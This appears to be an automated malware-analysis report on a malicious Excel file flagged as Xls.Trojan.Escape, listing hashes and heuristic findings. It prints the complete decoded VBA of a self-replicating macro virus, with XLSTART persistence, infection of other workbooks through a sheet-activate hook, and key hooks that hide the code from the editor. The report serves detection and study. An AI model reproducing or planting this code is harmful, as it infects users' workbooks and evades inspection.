Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 26366caf8e76a2b0…

MALICIOUS

Office (OLE)

92.0 KB Created: 2010-12-06 03:58:23 Authoring application: Microsoft Excel First seen: 2014-05-13
MD5: a29a062a6e98bc37736ba3edbc5db213 SHA-1: 912557fb09f50bc0e982f4f61b9d59a20a80399a SHA-256: 26366caf8e76a2b0634395a908ecd75b5e98de041cb9d890f913adea2823c115
268 Risk Score

Heuristics 6

  • ClamAV: Xls.Trojan.Escape-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Escape-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
      If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
      Application.OnSheetActivate = "StartUp.xls!ycop"
  • VBA hooks the VBE-editor / macro-list keys to evade inspection high OLE_VBA_VBE_KEY_HOOK_EVASION
    The macro reroutes Alt+F11 (Visual Basic editor) and/or Alt+F8 (macro list) through Application.OnKey, so an analyst's attempt to open the macro code is intercepted. This anti-analysis trick is a hallmark of resident Excel macro viruses hiding the viral module while it is loaded.
    Matched line in script
      Application.OnKey "%{F11}", "StartUp.xls!escape"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1767 bytes
SHA-256: b1dc6e799f600e1fe03c12ee5c927d9c20e72385747b65f9e697c96da1cbf849
Detection
ClamAV: Xls.Trojan.Escape-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub escape()
    On Error Resume Next
    Application.OnSheetActivate = "StartUp.xls!back"
    Application.OnKey "%{F11}"
    Application.OnKey "%{F8}"
    Application.SendKeys "%{F11}"
    Application.SendKeys "%{F8}"
    For Each book In Workbooks
        Application.DisplayAlerts = False
        If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete
    Next
    For Each book In Workbooks
        If book.Name = "StartUp.xls" Then
        book.Close
    End If
    Next
End Sub

Sub back()
  On Error Resume Next
  Application.OnKey "%{F8}", "StartUp.xls!escape"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!ycop"
  Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub